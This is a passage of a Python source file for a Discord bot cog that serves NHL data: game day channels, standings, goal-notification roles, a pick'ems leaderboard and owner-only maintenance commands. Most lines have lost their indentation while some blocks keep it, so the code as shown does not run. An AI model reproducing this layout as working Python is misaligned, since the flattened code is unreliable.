check = lambda m: m.author == ctx.message.author and m.attachments != []
try:
msg = await self.bot.wait_for("message", check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send(_("Emoji changing cancelled"))
break
if msg.content.lower().strip() == "exit":
await ctx.send(_("Emoji changing cancelled"))
break
return msg
##############################################################################
# Here are all the bot commands
    @commands.group(name="hockey", aliases=["nhl"])
    async def hockey_commands(self, ctx):
        """
        Get information from NHL.com
        """
        # Group parent only; the work happens in its subcommands.
        pass
@commands.group(name="hockeyset", aliases=["nhlset"])
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def hockeyset_commands(self, ctx):
"""
Setup commands for the server
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
standings_channel = guild.get_channel(
await self.config.guild(guild).standings_channel()
)
post_standings = (
_("On") if await self.config.guild(guild).post_standings() else _("Off")
)
gdc_channels = await self.config.guild(guild).gdc()
if standings_channel is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_chn = standings_channel.mention
else:
standings_chn = standings_channel.name
try:
standings_msg = await standings_channel.get_message(
await self.config.guild(guild).standings_msg()
)
except discord.errors.NotFound:
standings_msg = None
pass
if standings_msg is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_msg = (
_("[Standings") + f" {post_standings}]({standings_msg.jump_url})"
)
else:
standings_msg = (
_("Standings") + f" {post_standings}```{standings_msg.jump_url}"
)
else:
standings_chn = "None"
standings_msg = "None"
channels = ""
for channel in await self.config.all_channels():
chn = guild.get_channel(channel)
if chn is not None:
teams = ", ".join(t for t in await self.config.channel(chn).team())
is_gdc = "(GDC)" if chn.id in gdc_channels else ""
if ctx.channel.permissions_for(guild.me).embed_links:
channels += f"{chn.mention}{is_gdc}: {teams}\n"
else:
channels += f"#{chn.name}{is_gdc}: {teams}\n"
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=guild.name + _(" Hockey Settings"))
em.colour = await self.bot.db.color()
em.description = channels
em.add_field(
name=_("Standings Settings"), value=f"{standings_chn}: {standings_msg}"
)
await ctx.send(embed=em)
else:
msg = (
f"```\n{guild.name} "
+ _("Hockey Settings\n")
+ f"{channels}\n"
+ _("Standings Settings")
+ "\n#{standings_chn}: {standings_msg}"
)
if standings_msg is not None:
await ctx.send(msg)
else:
await ctx.send(msg + "```")
@commands.group()
@checks.mod_or_permissions(manage_channels=True)
@commands.guild_only()
async def gdc(self, ctx):
"""
Game Day Channel setup for the server
You can setup only a single team or all teams for the server
Game day channels are deleted and created on the day after the game is played
usually around 9AM PST
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
create_channels = await self.config.guild(guild).create_channels()
if create_channels is None:
return
team = await self.config.guild(guild).gdc_team()
if team is None:
team = "None"
channels = await self.config.guild(guild).gdc()
category = self.bot.get_channel(await self.config.guild(guild).category())
delete_gdc = await self.config.guild(guild).delete_gdc()
if category is not None:
category = category.name
if channels is not None:
created_channels = ""
for channel in channels:
chn = self.bot.get_channel(channel)
if chn is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
created_channels += chn.mention
else:
created_channels += "#" + chn.name
else:
created_channels += "<#{}>\n".format(channel)
if len(channels) == 0:
created_channels = "None"
else:
created_channels = "None"
if not ctx.channel.permissions_for(guild.me).embed_links:
msg = (
_("```GDC settings for")
+ guild.name
+ "\n"
+ _("Create Game Day Channels:")
+ create_channels
+ "\n"
+ _("Delete Game Day Channels: ")
+ delete_gdc
+ "\n"
+ _("Team:")
+ team
+ "\n"
+ _("Current Channels:")
+ created_channels
+ "```"
)
await ctx.send(msg)
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=_("GDC settings for ") + guild.name)
em.colour = await self.bot.db.color()
em.add_field(name=_("Create Game Day Channels"), value=str(create_channels))
em.add_field(name=_("Delete Game Day Channels"), value=str(delete_gdc))
em.add_field(name=_("Team"), value=str(team))
em.add_field(name=_("Current Channels"), value=created_channels)
await ctx.send(embed=em)
#######################################################################
# All Game Day Channel Commands
@gdc.command(name="delete")
async def gdc_delete(self, ctx):
"""
Delete all current game day channels for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.delete_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels deleted."))
@gdc.command(name="create")
async def gdc_create(self, ctx):
"""
Creates the next gdc for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.create_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels created."))
@gdc.command(name="toggle")
async def gdc_toggle(self, ctx):
"""
Toggles the game day channel creation on this server
"""
guild = ctx.message.guild
cur_setting = not await self.config.guild(guild).create_channels()
verb = _("will") if cur_setting else _("won't")
msg = _("Game day channels ") + verb + _(" be created on this server.")
await self.config.guild(guild).create_channels.set(cur_setting)
await ctx.send(msg)
@gdc.command(name="category")
async def gdc_category(self, ctx, category: discord.CategoryChannel):
"""
Change the category for channel creation. Channel is case sensitive.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).category()
msg = _("Game day channels will be created in ")
await self.config.guild(guild).category.set(category.id)
await ctx.send(msg + category.name)
@gdc.command(name="autodelete")
async def gdc_autodelete(self, ctx):
"""
Toggle's auto deletion of game day channels.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).delete_gdc()
verb = _("won't") if cur_setting else _("will")
msg = (
_("Game day channels ")
+ verb
+ _(" be deleted on this server.\n")
+ _("Note, this may not happen until the next set of games.")
)
await self.config.guild(guild).delete_gdc.set(not cur_setting)
await ctx.send(msg)
@gdc.command(name="setup")
async def gdc_setup(
self,
ctx,
team: HockeyTeams,
category: discord.CategoryChannel = None,
delete_gdc: bool = True,
):
"""
Setup game day channels for a single team or all teams
Required parameters:
`team` must use quotes if a space is in the name will search for partial team name
Optional Parameters:
`category` must use quotes if a space is in the name will default to current category
`delete_gdc` will tell the bot whether or not to delete game day channels automatically
must be either `True` or `False` and a category must be provided
"""
guild = ctx.message.guild
if guild is None:
await ctx.send("This needs to be done in a server.")
return
if category is None:
category = guild.get_channel(ctx.message.channel.category_id)
if not category.permissions_for(guild.me).manage_channels:
await ctx.send(_("I don't have manage channels permission!"))
return
await self.config.guild(guild).category.set(category.id)
await self.config.guild(guild).gdc_team.set(team)
await self.config.guild(guild).delete_gdc.set(delete_gdc)
if team.lower() != "all":
await GameDayChannels.create_gdc(self.bot, guild)
else:
game_list = await Game.get_games()
for game in game_list:
await GameDayChannels.create_gdc(self.bot, guild, game)
await ctx.send(_("Game Day Channels for ") + team + _("setup in ") + category.name)
#######################################################################
# All Hockey setup commands
@hockeyset_commands.command()
@checks.admin_or_permissions(administrator=True)
async def reset(self, ctx):
"""
Restarts the hockey loop incase there are issues with the posts
"""
msg = await ctx.send(_("Restarting..."))
self.loop.cancel()
await msg.edit(content=msg.content + _("loop closed..."))
self.loop = self.bot.loop.create_task(self.game_check_loop())
await msg.edit(content=msg.content + _("restarted"))
# await ctx.send("Done.")
@hockeyset_commands.command(hidden=True)
async def leaderboardset(
self, ctx, user: discord.Member, season: int, weekly: int = None, total: int = None
):
"""
Allows moderators to set a users points on the leaderboard
"""
if weekly is None:
weekly = season
if total is None:
total = season
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if str(user.id) not in leaderboard:
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
else:
del leaderboard[str(user.id)]
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
msg = (
user.display_name
+ _(" now has ")
+ season
+ _(" points on the season, ")
+ weekly
+ _(" points for the week,")
+ _(" and ")
+ total
+ _(" votes overall.")
)
await ctx.send(msg)
@hockeyset_commands.command(name="poststandings", aliases=["poststanding"])
async def post_standings(self, ctx, standings_type: str, channel: discord.TextChannel = None):
"""
Posts automatic standings when all games for the day are done
`standings_type` can be a division, conference, team, or all
`channel` will default to the current channel or be specified
"""
guild = ctx.message.guild
if channel is None:
channel = ctx.message.channel
standings_list = [
"metropolitan",
"atlantic",
"pacific",
"central",
"eastern",
"western",
"all",
]
division = ["metropolitan", "atlantic", "pacific", "central"]
if standings_type.lower() not in standings_list:
await ctx.send(
_("You must choose from ") + "{}".format(", ".join(s for s in standings_list))
)
return
standings, page = await Standings.get_team_standings(standings_type.lower())
if standings_type.lower() != "all":
em = await Standings.build_standing_embed(standings, page)
else:
em = await Standings.all_standing_embed(standings, page)
await self.config.guild(guild).standings_type.set(standings_type)
await self.config.guild(guild).standings_channel.set(channel.id)
await ctx.send(_("Sending standings to") + channel.mention)
message = await channel.send(embed=em)
await self.config.guild(guild).standings_msg.set(message.id)
await ctx.send(
standings_type
+ _(" standings will now be automatically updated in ")
+ channel.mention
)
await self.config.guild(guild).post_standings.set(True)
@hockeyset_commands.command()
async def togglestandings(self, ctx):
"""
Toggles automatic standings updates
This updates at the same time as the game day channels (usually 9AM PST)
"""
guild = ctx.message.guild
cur_state = not await self.config.guild(guild).post_standings()
verb = _("will") if cur_state else _("won't")
msg = _("Okay, standings ") + verb + _("be updated automatically.")
await self.config.guild(guild).post_standings.set(cur_state)
await ctx.send(msg)
@hockeyset_commands.command(name="add", aliases=["add_goals"])
async def add_goals(self, ctx, team: HockeyTeams, channel: discord.TextChannel = None):
"""
Adds a hockey team goal updates to a channel do 'all' for all teams
`team` needs to be all or part of an NHL team if more than one team
match it will ask for the correct team.
`channel` defaults to the current channel
"""
guild = ctx.message.guild
# team_data = await self.get_team(team)
if channel is None:
channel = ctx.message.channel
if not channel.permissions_for(guild.me).embed_links:
await ctx.send(_("I don't have embed links permission!"))
return
cur_teams = await self.config.channel(channel).team()
cur_teams = [] if cur_teams is None else cur_teams
if team in cur_teams:
await self.config.channel(channel).team.set([team])
else:
cur_teams.append(team)
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goals will be posted in ") + channel.mention)
@hockeyset_commands.command(name="del", aliases=["remove", "rem"])
async def remove_goals(
self, ctx, team: HockeyTeams = None, channel: discord.TextChannel = None
):
"""
Removes a teams goal updates from a channel
defaults to the current channel
"""
if channel is None:
channel = ctx.message.channel
cur_teams = await self.config.channel(channel).team()
if cur_teams is None:
await ctx.send(_("no teams are currently being posted in ") + channel.mention)
return
if team is None:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
return
if team is not None:
guild = ctx.message.guild
if team in cur_teams:
cur_teams.remove(team)
if cur_teams == []:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
else:
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goal updates removed from ") + channel.mention)
#######################################################################
# All Basic Hockey Commands
@hockey_commands.command()
async def version(self, ctx):
"""
Display the current version
"""
await ctx.send(_("Hockey version ") + __version__)
@commands.command()
async def hockeyhub(self, ctx, *, search: str):
"""
Search for hockey related items on https://hockeyhub.github.io/
lines team Team lines on Daily Faceoff
stats [year] team Team stats on nhl.com, year optional
schedule team Team schedule on nhl.com
draft team oryear Draft history for team or year on Elite Prospects
cap team orplayer Cap information for team or player on CapFriendly
player player Search for player on Elite Prospects
depth team Team depth chart on Elite Prospects
prospects team Team prospects on Elite Prospects
trades team Team trade history on NHL Trade Tracker
jersey [team] number orname Find a player by jersey number
highlights [team] Game Highlights, team optional
reddit team Team subreddit on Reddit
"""
search = quote(search)
await ctx.send("https://hockeyhub.github.io/?search=" + search)
@hockey_commands.command(name="role")
async def team_role(self, ctx, *, team: HockeyTeams):
"""Set your role to a team role"""
guild = ctx.message.guild
if not guild.me.guild_permissions.manage_roles:
return
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and "GOAL" not in role.name)
]
await ctx.author.add_roles(role[0])
await ctx.send(role[0].name + _("role applied."))
except Exception as e:
log.error("error adding team role", exc_info=True)
await ctx.send(team + _(" is not an available role!"))
@hockey_commands.command(name="goals")
async def team_goals(self, ctx, *, team: HockeyTeams = None):
"""Subscribe to goal notifications"""
guild = ctx.message.guild
member = ctx.message.author
if not guild.me.guild_permissions.manage_roles:
return
if team is None:
team_roles = []
for role in guild.roles:
if role.name in [r.name + " GOAL" for r in member.roles]:
team_roles.append(role)
if team_roles != []:
for role in team_roles:
await ctx.message.author.add_roles(role)
role_list = ", ".join(r.name for r in team_roles)
await ctx.message.channel.send(f"{role_list} role applied.")
return
else:
return
else:
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and role.name.endswith("GOAL"))
]
await ctx.message.author.add_roles(role[0])
await ctx.message.channel.send(role[0].name + _(" role applied."))
except Exception as e:
await ctx.message.channel.send(team + _(" is not an available role!"))
@hockey_commands.command()
async def standings(self, ctx, *, search: HockeyStandings = None):
"""
Displays current standings
If a search is provided you can see a teams complete stats
by searching for team or get all standings at once
separated by division
"""
if search is None:
standings, page = await Standings.get_team_standings("division")
await hockey_menu(ctx, "standings", standings)
return
standings, page = await Standings.get_team_standings(search.lower())
if search != "all":
await hockey_menu(ctx, "standings", standings, None, page)
else:
await hockey_menu(ctx, "all", standings, None, page)
@hockey_commands.command(aliases=["score"])
async def games(self, ctx, *, team: HockeyTeams = None):
"""
Gets all NHL games for the current season
If team is provided it will grab that teams schedule
"""
games_list = []
page_num = 0
today = datetime.now()
start_date = datetime.strptime(f"{get_season()[0]}-9-1", "%Y-%m-%d")
games_list = await Game.get_games_list(team, start_date)
for game in games_list:
game_time = datetime.strptime(game["gameDate"], "%Y-%m-%dT%H:%M:%SZ")
if game_time >= today:
page_num = games_list.index(game)
break
if games_list != []:
await hockey_menu(ctx, "game", games_list, None, page_num)
else:
await ctx.message.channel.send(team + _(" have no recent or upcoming games!"))
@hockey_commands.command(aliases=["player"])
async def players(self, ctx, *, search):
"""
Search for a player or get a team roster
"""
rosters = {}
players = []
teams = [team for team in TEAMS if search.lower() in team.lower()]
if teams != []:
for team in teams:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]["id"]}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
for player in data["roster"]:
players.append(player)
else:
for team in TEAMS:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]["id"]}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
try:
rosters[team] = data["roster"]
except KeyError:
pass
for team in rosters:
for player in rosters[team]:
if search.lower() in player["person"]["fullName"].lower():
players.append(player)
if players != []:
await hockey_menu(ctx, "roster", players)
else:
await ctx.send(search + _(" is not an NHL team or Player!"))
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def rules(self, ctx):
"""
Display a nice embed of server specific rules
"""
if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
return
rules = await self.config.guild(ctx.guild).rules()
team = await self.config.guild(ctx.guild).team_rules()
if rules == "":
return
em = await make_rules_embed(ctx.guild, team, rules)
if ctx.channel.permissions_for(ctx.guild.me).manage_messages:
await ctx.message.delete()
await ctx.send(embed=em)
    @hockey_commands.command(hidden=True)
    @checks.admin_or_permissions(manage_messages=True)
    async def pickems_page(self, ctx, date: str = None):
        """
        Generates a pickems page for voting on a specified day must be "DD-MM-YYYY"
        """
        if date is None:
            date = datetime.now()
        else:
            date = datetime.strptime(date, "%d-%m-%Y")
        msg = _(
            "**Welcome to our daily Pick'ems challenge!  Below you will see today's games!"
            " Vote for who you think will win!  You get one point for each correct prediction."
            "  We will be tracking points over the course of the season and will be rewarding weekly,"
            " worst and full-season winners!**\n\n"
            "- Click the reaction for the team you think will win the day's match-up.\n"
            "- Anyone who votes for both teams will have their vote removed and will receive no points!\n\n\n\n"
        )
        # Same start and end date: only that single day's games.
        games_list = await Game.get_games(None, date, date)
        await ctx.send(msg)
        for game in games_list:
            new_msg = await ctx.send(
                "__**{} {}**__ @ __**{} {}**__".format(
                    game.away_emoji, game.away_team, game.home_emoji, game.home_team
                )
            )
            # Create new pickems object for the game
            await Pickems.create_pickem_object(ctx.guild, new_msg, ctx.channel, game)
            if ctx.channel.permissions_for(ctx.guild.me).add_reactions:
                try:
                    # [2:-1] strips the "<:" prefix and ">" suffix from the
                    # stored custom-emoji mention string.
                    await new_msg.add_reaction(game.away_emoji[2:-1])
                    await new_msg.add_reaction(game.home_emoji[2:-1])
                except Exception as e:
                    log.debug("Error adding reactions")
async def post_leaderboard(self, ctx, leaderboard_type):
"""
Posts the leaderboard based on specific style
"""
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if leaderboard_type != "worst":
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1][leaderboard_type], reverse=True
)
else:
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1]["total"] - i[1]["season"], reverse=True
)
msg_list = []
count = 1
user_position = None
for member_id in leaderboard:
if str(member_id[0]) == str(ctx.author.id):
user_position = leaderboard.index(member_id)
member = ctx.guild.get_member(int(member_id[0]))
if member is None:
member_mention = _("User has left the server ") + member_id[0]
else:
member_mention = member.mention
if leaderboard_type == "weekly":
points = member_id[1]["weekly"]
msg_list.append("#{}. {}: {}\n".format(count, member_mention, points))
elif leaderboard_type == "season":
total = member_id[1]["total"]
wins = member_id[1]["season"]
percent = (wins / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {wins}/{total} correct ({percent:.4}%)\n"
)
else:
total = member_id[1]["total"]
losses = member_id[1]["total"] - member_id[1]["season"]
percent = (losses / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {losses}/{total} incorrect ({percent:.4}%)\n"
)
count += 1
leaderboard_list = [msg_list[i : i + 10] for i in range(0, len(msg_list), 10)]
if user_position is not None:
user = leaderboard[user_position][1]
wins = user["season"]
total = user["total"]
losses = user["total"] - user["season"]
position = (
ctx.author.display_name
+ _(", you're #")
+ str(user_position + 1)
+ " on the "
+ leaderboard_type
+ _(" leaderboard!")
)
if leaderboard_type == "season":
percent = (wins / total) * 100
position += (
_(" You have ") + f"{wins}/{total} " + _("correct ") + f"({percent:.4}%)."
)
elif leaderboard_type == "worst":
percent = (losses / total) * 100
position += (
_(" You have ") + f"{losses}/{total} " + _("incorrect ") + f"({percent:.4}%)."
)
await ctx.send(position)
await hockey_menu(ctx, leaderboard_type, leaderboard_list)
@hockey_commands.command()
@commands.guild_only()
async def leaderboard(self, ctx, leaderboard_type: str = "seasonal"):
"""
Shows the current server leaderboard either seasonal or weekly
"""
if leaderboard_type in ["seasonal", "season"]:
await self.post_leaderboard(ctx, "season")
if leaderboard_type in ["weekly", "week"]:
await self.post_leaderboard(ctx, "weekly")
if leaderboard_type in ["worst"]:
await self.post_leaderboard(ctx, "worst")
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def setrules(self, ctx, team: HockeyTeams, *, rules):
    """Set the main rules page for the nhl rules command"""
    # The preview is sent as an embed, so bail out early without it.
    can_embed = ctx.channel.permissions_for(ctx.guild.me).embed_links
    if not can_embed:
        await ctx.send(_("I don't have embed links permission!"))
        return
    guild_conf = self.config.guild(ctx.guild)
    await guild_conf.rules.set(rules)
    await guild_conf.team_rules.set(team)
    preview = await make_rules_embed(ctx.guild, team, rules)
    await ctx.send(_("Done, here's how it will look."), embed=preview)
@hockey_commands.command(aliases=["link", "invite"])
async def otherdiscords(self, ctx, team: HockeyTeams):
    """
    Get team specific discord links

    choosing all will create a nicely formatted list of
    all current NHL team discord server links
    """
    if team not in ["all"]:
        # Single team: just post that team's invite link.
        await ctx.send(TEAMS[team]["invite"])
    else:
        if not ctx.channel.permissions_for(ctx.message.author).manage_messages:
            # Don't need everyone spamming this command
            return
        # Bucket teams by NHL division for the master list.
        atlantic = [team for team in TEAMS if TEAMS[team]["division"] == "Atlantic"]
        metropolitan = [team for team in TEAMS if TEAMS[team]["division"] == "Metropolitan"]
        central = [team for team in TEAMS if TEAMS[team]["division"] == "Central"]
        pacific = [team for team in TEAMS if TEAMS[team]["division"] == "Pacific"]
        team_list = {
            "Atlantic": atlantic,
            "Metropolitan": metropolitan,
            "Central": central,
            "Pacific": pacific,
        }
        msg1 = _(
            "__**Hockey Discord Master List**__\n```fix\n"
            "- Do not join other discords to troll.\n- "
            "Respect their rules & their members (Yes even the leafs & habs unfortunately).\n- "
            "We don't control the servers below. If you get banned we can not get you unbanned.\n- "
            "Don't be an asshole because then we all look like assholes. They won't see it as one asshole "
            "fan they will see it as a toxic fanbase.\n- Salt levels may vary. Your team is the best "
            "here but don't go on another discord and preach it to an angry mob after we just won.\n- "
            "Not following the above rules will result in appropriate punishments ranging from a warning"
            "to a ban. ```\n\nhttps://discord.gg/reddithockey"
        )
        eastern_conference = "https://i.imgur.com/CtXvcCs.png"
        western_conference = "https://i.imgur.com/UFYJTDF.png"
        # Download the eastern conference banner and attach it to the rules post.
        async with self.session.get(eastern_conference) as resp:
            data = await resp.read()
        logo = BytesIO()
        logo.write(data)
        logo.seek(0)
        image = discord.File(logo, filename="eastern_logo.png")
        await ctx.send(msg1, file=image)
        for division in team_list:
            if division == "Central":
                # Central is the first western division in iteration order,
                # so post the western conference banner just before it.
                async with self.session.get(western_conference) as resp:
                    data = await resp.read()
                logo = BytesIO()
                logo.write(data)
                logo.seek(0)
                image = discord.File(logo, filename="western_logo.png")
                await ctx.send(file=image)
            # Division header uses the per-division emoji from constants.
            div_emoji = "<:" + TEAMS["Team {}".format(division)]["emoji"] + ">"
            msg = "{0} __**{1} DIVISION**__ {0}".format(div_emoji, division.upper())
            await ctx.send(msg)
            for team in team_list[division]:
                team_emoji = "<:" + TEAMS[team]["emoji"] + ">"
                team_link = TEAMS[team]["invite"]
                msg = "{0} {1} {0}".format(team_emoji, team_link)
                await ctx.send(msg)
@hockey_commands.command()
@checks.is_owner()
async def getgoals(self, ctx):
    """
    Testing function with testgame.json

    Loads a saved game payload from disk, runs the normal game-state
    and goal checks against it, then clears the stored data for the
    two teams involved.
    """
    # Removed unused locals `to_remove` and `games_playing` from the
    # original; they were never read.
    # NOTE(review): hard coded local path — owner-only test command.
    with open("/mnt/e/github/Trusty-cogs/hockey/testgame.json", "r") as infile:
        data = json.loads(infile.read())
    game = await Game.from_json(data)
    await game.check_game_state(self.bot)
    if (game.home_score + game.away_score) != 0:
        await game.check_team_goals(self.bot)
    all_teams = await self.config.teams()
    for team in await self.config.teams():
        if team["team_name"] in [game.home_team, game.away_team]:
            # Move the entry to the end of the list with its state cleared.
            all_teams.remove(team)
            team["goal_id"] = {}
            team["game_state"] = "Null"
            team["game_start"] = ""
            team["period"] = 0
            all_teams.append(team)
    await self.config.teams.set(all_teams)
    await ctx.send("Done testing.")
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def pickems_tally(self, ctx):
    """
    Manually tally the leaderboard
    """
    # All of the work lives in the Pickems helper; this command just
    # triggers it and confirms completion.
    await Pickems.tally_leaderboard(self.bot)
    await ctx.send(_("Leaderboard tallying complete."))
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def check_pickem_winner(self, ctx, days: int = 1):
    """
    Manually check all pickems objects for winners

    `days` number of days to look back
    """
    now = datetime.now()
    # Walk backwards one day at a time, re-running winner detection
    # for every game played on each day.
    for offset in range(1, days + 1):
        check_day = now - timedelta(days=offset)
        games = await Game.get_games(None, check_day, check_day)
        for game in games:
            await Pickems.set_guild_pickem_winner(self.bot, game)
    await ctx.send(_("Pickems winners set."))
@gdc.command(hidden=True, name="test")
@checks.is_owner()
async def test_gdc(self, ctx):
    """
    Test checking for new game day channels
    """
    # Directly exercise the GDC refresh logic outside the daily loop.
    await GameDayChannels.check_new_gdc(self.bot)
@hockeyset_commands.command()
@checks.is_owner()
async def teststandings(self, ctx):
    """
    Test the automatic standings function/manually update standings
    """
    try:
        await Standings.post_automatic_standings(self.bot)
    except Exception:
        # Log the traceback instead of surfacing the error to chat.
        log.debug("error testing standings page", exc_info=True)
@hockeyset_commands.command()
@checks.is_owner()
async def cogstats(self, ctx):
    """
    Display current number of servers and channels
    the cog is storing in console
    """
    all_channels = await self.config.all_channels()
    all_guilds = await self.config.all_guilds()
    guild_list = {}
    # Count how many tracked channels resolve to each visible server.
    for channel_id in all_channels.keys():
        channel = self.bot.get_channel(channel_id)
        if channel is None:
            log.debug(channel_id)
            continue
        name = channel.guild.name
        guild_list[name] = guild_list.get(name, 0) + 1
    msg = "Servers:{}\nNumber of Channels: {}\nNumber of Servers: {}".format(
        guild_list, len(all_channels), len(all_guilds)
    )
    log.debug(msg)
#######################################################################
# Owner Only Commands Mostly for Testing
@hockeyset_commands.command()
@checks.is_owner()
async def customemoji(self, ctx):
    """
    Set custom emojis for the bot to use

    Requires you to upload a .yaml file with
    emojis that the bot can see
    an example may be found [here](https://github.com/TrustyJAID/Trusty-cogs/blob/V3/hockey/emoji.yaml)
    if no emoji is provided for a team the Other
    slot will be filled instead
    It's recommended to have an emoji for every team
    to utilize all features of the cog such as pickems
    """
    attachments = ctx.message.attachments
    if attachments == []:
        # No file on the invoking message: prompt and wait for an upload.
        await ctx.send(_("Upload the .yaml file to use. Type `exit` to cancel."))
        msg = await self.wait_for_file(ctx)
        if msg is None:
            # Cancelled or timed out while waiting.
            return
        try:
            await self.change_custom_emojis(msg.attachments)
        except InvalidFileError:
            await ctx.send(_("That file doesn't seem to be formatted correctly."))
            return
    else:
        # File was attached directly to the command invocation.
        try:
            await self.change_custom_emojis(attachments)
        except InvalidFileError:
            await ctx.send(_("That file doesn't seem to be formatted correctly."))
            return
    # Preview every team emoji as it will now render.
    new_msg = "".join(("<:" + TEAMS[e]["emoji"] + ">") for e in TEAMS)
    await ctx.send(_("New emojis set to: ") + new_msg)
    await ctx.send("You should reload the cog for everything to work correctly.")
@hockeyset_commands.command()
@checks.is_owner()
async def resetgames(self, ctx):
    """
    Resets the bots game data incase something goes wrong
    """
    all_teams = await self.config.teams()
    # Rebuild the stored list with every entry's game state cleared.
    for entry in await self.config.teams():
        all_teams.remove(entry)
        entry["goal_id"] = {}
        entry["game_state"] = "Null"
        entry["game_start"] = ""
        entry["period"] = 0
        all_teams.append(entry)
    await self.config.teams.set(all_teams)
    await ctx.send(_("Saved game data reset."))
@gdc.command()
@checks.is_owner()
async def setcreated(self, ctx, created: bool):
    """
    Sets whether or not the game day channels have been created
    """
    # Flip the daily-creation flag directly; the game loop reads it.
    await self.config.created_gdc.set(created)
    await ctx.send(_("created_gdc set to ") + str(created))
@gdc.command()
@checks.is_owner()
async def cleargdc(self, ctx):
    """
    Checks for manually deleted channels from the GDC channel list
    and removes them
    """
    guild = ctx.message.guild
    good_channels = []
    for channel_id in await self.config.guild(guild).gdc():
        channel = self.bot.get_channel(channel_id)
        if channel is None:
            # Channel no longer exists: drop its config scope entirely.
            await self.config._clear_scope(Config.CHANNEL, str(channel_id))
            # Bug fix: log message was missing a space before the id;
            # also use lazy %-formatting.
            log.info("Removed the following channels %s", channel_id)
            continue
        good_channels.append(channel.id)
    await self.config.guild(guild).gdc.set(good_channels)
@hockeyset_commands.command()
@checks.is_owner()
async def clear_broken_channels(self, ctx):
    """
    Removes missing channels from the config
    """
    for channel_id in await self.config.all_channels():
        channel = self.bot.get_channel(channel_id)
        if channel is None:
            # Channel no longer resolvable: drop its config scope.
            await self.config._clear_scope(Config.CHANNEL, str(channel_id))
            # Bug fix: log message was missing a space before the id;
            # also use lazy %-formatting.
            log.info("Removed the following channels %s", channel_id)
    await ctx.send(_("Broken channels removed"))
@hockeyset_commands.command()
@checks.is_owner()
async def remove_broken_guild(self, ctx):
    """
    Removes a server that no longer exists on the bot
    """
    # Removed unused local `all_guilds`; the loop fetches its own copy.
    for guild_id in await self.config.all_guilds():
        guild = self.bot.get_guild(guild_id)
        if guild is None:
            # Bot was removed from this server: drop its config scope.
            await self.config._clear_scope(Config.GUILD, str(guild_id))
        elif not await self.config.guild(guild).create_channels():
            # Guild still exists but GDC creation is off: clear the
            # stale game-day-channel list.
            await self.config.guild(guild).gdc.set([])
    await ctx.send(_("Saved servers the bot is no longer on have been removed."))
@hockeyset_commands.command()
@checks.is_owner()
async def clear_weekly(self, ctx):
    """
    Clears the weekly tracker on the current servers pickems

    May not be necessary anymore
    """
    leaderboard = await self.config.guild(ctx.guild).leaderboard()
    if leaderboard is None:
        leaderboard = {}
    # Zero every member's weekly tally while leaving season/total intact.
    for member_id in leaderboard:
        leaderboard[str(member_id)]["weekly"] = 0
    await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
@hockey_commands.command(hidden=True)
@checks.is_owner()
async def lights(self, ctx):
    """
    Tests the philips Hue light integration

    This is hard coded at the moment with no plans to make work generally
    this will be safely ignored.
    """
    # Bug fix: the check was inverted — the original ran the Oilers
    # helper when the optional module had FAILED to import
    # (LIGHTS_SET False), which would raise NameError.  Only run when
    # the integration is actually available.
    if not LIGHTS_SET:
        return
    hue = Oilers(self.bot)
    await hue.goal_lights()
@hockeyset_commands.command()
@checks.is_owner()
async def testloop(self, ctx):
    """
    Toggle the test game loop
    """
    # Simple boolean flip of the test-mode flag read by game_check_loop.
    self.TEST_LOOP = not self.TEST_LOOP
    await ctx.send(_("Test loop set to ") + str(self.TEST_LOOP))
@hockeyset_commands.command()
@checks.is_owner()
async def rempickem(self, ctx):
    """
    Clears the servers current pickems object list
    """
    # Overwrite the stored list with an empty one.
    await self.config.guild(ctx.guild).pickems.set([])
    await ctx.send(_("All pickems removed on this server."))
@hockeyset_commands.command()
@checks.is_owner()
async def remleaderboard(self, ctx):
    """
    Clears the servers pickems leaderboard
    """
    # Replace the stored leaderboard with an empty mapping.
    await self.config.guild(ctx.guild).leaderboard.set({})
    await ctx.send(_("Server leaderboard reset."))
def __unload(self):
    # Clean up on cog unload: close the shared aiohttp session and
    # cancel the background game loop if it was started.
